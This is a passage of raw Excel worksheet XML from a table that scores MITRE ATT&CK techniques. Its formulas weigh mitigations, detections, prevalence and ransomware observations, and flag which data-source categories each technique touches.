        <v>0.1</v>
      </c>
      <c r="I631" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J631" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K631" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L631" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M631" s="37">
        <v>0</v>
      </c>
      <c r="N631" s="56">
        <v>0</v>
      </c>
      <c r="O631" s="56">
        <v>0</v>
      </c>
      <c r="P631" s="56">
        <v>0</v>
      </c>
      <c r="Q631" s="56">
        <v>7</v>
      </c>
      <c r="R631" s="57" t="s">
        <v>1312</v>
      </c>
      <c r="S631" s="57">
        <v>8</v>
      </c>
      <c r="T631" s="57" t="s">
        <v>1313</v>
      </c>
      <c r="U631" s="57">
        <v>15</v>
      </c>
      <c r="V631" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238104761904762</v>
      </c>
      <c r="W631" s="37">
        <v>23</v>
      </c>
      <c r="X631" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y631" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z631" s="37">
        <v>7</v>
      </c>
      <c r="AA631" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB631" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC631" s="37"/>
      <c r="AD631" s="50" t="s">
        <v>1314</v>
      </c>
      <c r="AE631" s="37" t="str" cm="1">
        <f t="array" ref="AE631">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD631)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF631" s="37">
        <v>627</v>
      </c>
      <c r="AG631" s="37" t="str" cm="1">
        <f t="array" ref="AG631">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD631)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH631" s="37">
        <v>627</v>
      </c>
      <c r="AI631" s="37" t="str" cm="1">
        <f t="array" ref="AI631">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD631)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ631" s="37">
        <v>627</v>
      </c>
      <c r="AK631" s="37" t="str" cm="1">
        <f t="array" ref="AK631">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD631)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL631" s="37">
        <v>627</v>
      </c>
      <c r="AM631" s="37" t="str" cm="1">
        <f t="array" ref="AM631">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD631)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN631" s="37">
        <v>0</v>
      </c>
      <c r="AO631" s="37">
        <v>0</v>
      </c>
      <c r="AP631" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ631" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>294.70801615873017</v>
      </c>
      <c r="AR631" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS631" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT631" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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32" spans="1:47" ht="34">
      <c r="A632" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B632" s="37">
        <f t="shared" si="9"/>
        <v>251.3</v>
      </c>
      <c r="C632" s="37" t="s">
        <v>2038</v>
      </c>
      <c r="D632" s="50" t="s">
        <v>2039</v>
      </c>
      <c r="E632" s="37"/>
      <c r="F632" s="37">
        <v>1</v>
      </c>
      <c r="G632" s="37">
        <v>1</v>
      </c>
      <c r="H632" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I632" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J632" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K632" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L632" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M632" s="37">
        <v>0</v>
      </c>
      <c r="N632" s="56">
        <v>0</v>
      </c>
      <c r="O632" s="56">
        <v>0</v>
      </c>
      <c r="P632" s="56">
        <v>0</v>
      </c>
      <c r="Q632" s="56">
        <v>0</v>
      </c>
      <c r="R632" s="57"/>
      <c r="S632" s="57">
        <v>0</v>
      </c>
      <c r="T632" s="57"/>
      <c r="U632" s="57"/>
      <c r="V632" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W632" s="37">
        <v>0</v>
      </c>
      <c r="X632" s="37">
        <v>0</v>
      </c>
      <c r="Y632" s="37">
        <v>0</v>
      </c>
      <c r="Z632" s="37">
        <v>0</v>
      </c>
      <c r="AA632" s="37">
        <v>0</v>
      </c>
      <c r="AB632" s="37">
        <v>0</v>
      </c>
      <c r="AC632" s="37"/>
      <c r="AD632" s="50" t="s">
        <v>2040</v>
      </c>
      <c r="AE632" s="37" t="str" cm="1">
        <f t="array" ref="AE632">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD632)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF632" s="37">
        <v>628</v>
      </c>
      <c r="AG632" s="37" t="str" cm="1">
        <f t="array" ref="AG632">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD632)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH632" s="37">
        <v>628</v>
      </c>
      <c r="AI632" s="37" t="str" cm="1">
        <f t="array" ref="AI632">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD632)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ632" s="37">
        <v>628</v>
      </c>
      <c r="AK632" s="37" t="str" cm="1">
        <f t="array" ref="AK632">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD632)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL632" s="37">
        <v>628</v>
      </c>
      <c r="AM632" s="37" t="str" cm="1">
        <f t="array" ref="AM632">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD632)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN632" s="37">
        <v>0</v>
      </c>
      <c r="AO632" s="37">
        <v>0</v>
      </c>
      <c r="AP632" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ632" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>83.766666666666666</v>
      </c>
      <c r="AR632" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS632" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT632" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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33" spans="1:47" ht="102">
      <c r="A633" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B633" s="37">
        <f t="shared" si="9"/>
        <v>251.70000000000002</v>
      </c>
      <c r="C633" s="37" t="s">
        <v>2041</v>
      </c>
      <c r="D633" s="50" t="s">
        <v>2042</v>
      </c>
      <c r="E633" s="37"/>
      <c r="F633" s="37">
        <v>1</v>
      </c>
      <c r="G633" s="37">
        <v>1</v>
      </c>
      <c r="H633" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I633" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J633" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K633" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L633" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M633" s="37">
        <v>0</v>
      </c>
      <c r="N633" s="56">
        <v>0</v>
      </c>
      <c r="O633" s="56">
        <v>0</v>
      </c>
      <c r="P633" s="56">
        <v>0</v>
      </c>
      <c r="Q633" s="56">
        <v>0</v>
      </c>
      <c r="R633" s="57"/>
      <c r="S633" s="57">
        <v>0</v>
      </c>
      <c r="T633" s="57"/>
      <c r="U633" s="57">
        <v>0</v>
      </c>
      <c r="V633" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W633" s="37">
        <v>0</v>
      </c>
      <c r="X633" s="37">
        <v>0</v>
      </c>
      <c r="Y633" s="37">
        <v>0</v>
      </c>
      <c r="Z633" s="37">
        <v>0</v>
      </c>
      <c r="AA633" s="37">
        <v>0</v>
      </c>
      <c r="AB633" s="37">
        <v>0</v>
      </c>
      <c r="AC633" s="37"/>
      <c r="AD633" s="50" t="s">
        <v>2043</v>
      </c>
      <c r="AE633" s="37" t="str" cm="1">
        <f t="array" ref="AE633">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD633)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF633" s="37">
        <v>629</v>
      </c>
      <c r="AG633" s="37" t="str" cm="1">
        <f t="array" ref="AG633">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD633)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH633" s="37">
        <v>629</v>
      </c>
      <c r="AI633" s="37" t="str" cm="1">
        <f t="array" ref="AI633">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD633)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ633" s="37">
        <v>629</v>
      </c>
      <c r="AK633" s="37" t="str" cm="1">
        <f t="array" ref="AK633">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD633)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL633" s="37">
        <v>629</v>
      </c>
      <c r="AM633" s="37" t="str" cm="1">
        <f t="array" ref="AM633">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD633)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN633" s="37">
        <v>0</v>
      </c>
      <c r="AO633" s="37">
        <v>0</v>
      </c>
      <c r="AP633" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ633" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>83.9</v>
      </c>
      <c r="AR633" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS633" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT633" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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34" spans="1:47" ht="17">
      <c r="A634" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B634" s="37">
        <f t="shared" si="9"/>
        <v>252.10000000000002</v>
      </c>
      <c r="C634" s="37" t="s">
        <v>3826</v>
      </c>
      <c r="D634" s="50" t="s">
        <v>3827</v>
      </c>
      <c r="E634" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F634" s="37">
        <v>1</v>
      </c>
      <c r="G634" s="37">
        <v>1</v>
      </c>
      <c r="H634" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I634" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J634" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K634" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L634" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M634" s="37">
        <v>0</v>
      </c>
      <c r="N634" s="56">
        <v>0</v>
      </c>
      <c r="O634" s="56">
        <v>0</v>
      </c>
      <c r="P634" s="56">
        <v>0</v>
      </c>
      <c r="Q634" s="56">
        <v>0</v>
      </c>
      <c r="R634" s="57"/>
      <c r="S634" s="57">
        <v>0</v>
      </c>
      <c r="T634" s="57"/>
      <c r="U634" s="57">
        <v>0</v>
      </c>
      <c r="V634" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W634" s="37"/>
      <c r="X634" s="37"/>
      <c r="Y634" s="37"/>
      <c r="Z634" s="37"/>
      <c r="AA634" s="37"/>
      <c r="AB634" s="37"/>
      <c r="AC634" s="37"/>
      <c r="AD634" s="50" t="s">
        <v>3828</v>
      </c>
      <c r="AE634" s="37" t="str" cm="1">
        <f t="array" ref="AE634">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD634)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF634" s="37">
        <v>630</v>
      </c>
      <c r="AG634" s="37" t="str" cm="1">
        <f t="array" ref="AG634">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD634)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH634" s="37">
        <v>630</v>
      </c>
      <c r="AI634" s="37" t="str" cm="1">
        <f t="array" ref="AI634">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD634)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ634" s="37">
        <v>630</v>
      </c>
      <c r="AK634" s="37" t="str" cm="1">
        <f t="array" ref="AK634">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD634)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL634" s="37">
        <v>630</v>
      </c>
      <c r="AM634" s="37" t="str" cm="1">
        <f t="array" ref="AM634">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD634)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN634" s="37"/>
      <c r="AO634" s="37">
        <v>0</v>
      </c>
      <c r="AP634" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ634" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.033333333333346</v>
      </c>
      <c r="AR634" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS634" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT634" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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35" spans="1:47" ht="34">
      <c r="A635" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B635" s="37">
        <f t="shared" si="9"/>
        <v>252.5</v>
      </c>
      <c r="C635" s="37" t="s">
        <v>3829</v>
      </c>
      <c r="D635" s="50" t="s">
        <v>3830</v>
      </c>
      <c r="E635" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F635" s="37">
        <v>1</v>
      </c>
      <c r="G635" s="37">
        <v>1</v>
      </c>
      <c r="H635" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I635" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J635" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K635" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L635" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M635" s="37">
        <v>0</v>
      </c>
      <c r="N635" s="56">
        <v>0</v>
      </c>
      <c r="O635" s="56">
        <v>0</v>
      </c>
      <c r="P635" s="56">
        <v>0</v>
      </c>
      <c r="Q635" s="56">
        <v>0</v>
      </c>
      <c r="R635" s="57"/>
      <c r="S635" s="57">
        <v>0</v>
      </c>
      <c r="T635" s="57"/>
      <c r="U635" s="57">
        <v>0</v>
      </c>
      <c r="V635" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W635" s="37"/>
      <c r="X635" s="37"/>
      <c r="Y635" s="37"/>
      <c r="Z635" s="37"/>
      <c r="AA635" s="37"/>
      <c r="AB635" s="37"/>
      <c r="AC635" s="37"/>
      <c r="AD635" s="50" t="s">
        <v>418</v>
      </c>
      <c r="AE635" s="37" t="str" cm="1">
        <f t="array" ref="AE635">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD635)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF635" s="37">
        <v>631</v>
      </c>
      <c r="AG635" s="37" t="str" cm="1">
        <f t="array" ref="AG635">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD635)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH635" s="37">
        <v>631</v>
      </c>
      <c r="AI635" s="37" t="str" cm="1">
        <f t="array" ref="AI635">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD635)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ635" s="37">
        <v>631</v>
      </c>
      <c r="AK635" s="37" t="str" cm="1">
        <f t="array" ref="AK635">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD635)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL635" s="37">
        <v>631</v>
      </c>
      <c r="AM635" s="37" t="str" cm="1">
        <f t="array" ref="AM635">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD635)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN635" s="37"/>
      <c r="AO635" s="37">
        <v>0</v>
      </c>
      <c r="AP635" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ635" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.166666666666671</v>
      </c>
      <c r="AR635" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS635" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT635" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU63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36" spans="1:47" ht="51">
      <c r="A636" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B636" s="37">
        <f t="shared" si="9"/>
        <v>252.9</v>
      </c>
      <c r="C636" s="37" t="s">
        <v>3831</v>
      </c>
      <c r="D636" s="50" t="s">
        <v>3832</v>
      </c>
      <c r="E636" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F636" s="37">
        <v>1</v>
      </c>
      <c r="G636" s="37">
        <v>1</v>
      </c>
      <c r="H636" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I636" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J636" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K636" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L636" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M636" s="37">
        <v>0</v>
      </c>
      <c r="N636" s="56">
        <v>0</v>
      </c>
      <c r="O636" s="56">
        <v>0</v>
      </c>
      <c r="P636" s="56">
        <v>0</v>
      </c>
      <c r="Q636" s="56">
        <v>0</v>
      </c>
      <c r="R636" s="57"/>
      <c r="S636" s="57">
        <v>0</v>
      </c>
      <c r="T636" s="57"/>
      <c r="U636" s="57">
        <v>0</v>
      </c>
      <c r="V636" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W636" s="37"/>
      <c r="X636" s="37"/>
      <c r="Y636" s="37"/>
      <c r="Z636" s="37"/>
      <c r="AA636" s="37"/>
      <c r="AB636" s="37"/>
      <c r="AC636" s="37"/>
      <c r="AD636" s="50" t="s">
        <v>3833</v>
      </c>
      <c r="AE636" s="37" t="str" cm="1">
        <f t="array" ref="AE636">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD636)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF636" s="37">
        <v>632</v>
      </c>
      <c r="AG636" s="37" t="str" cm="1">
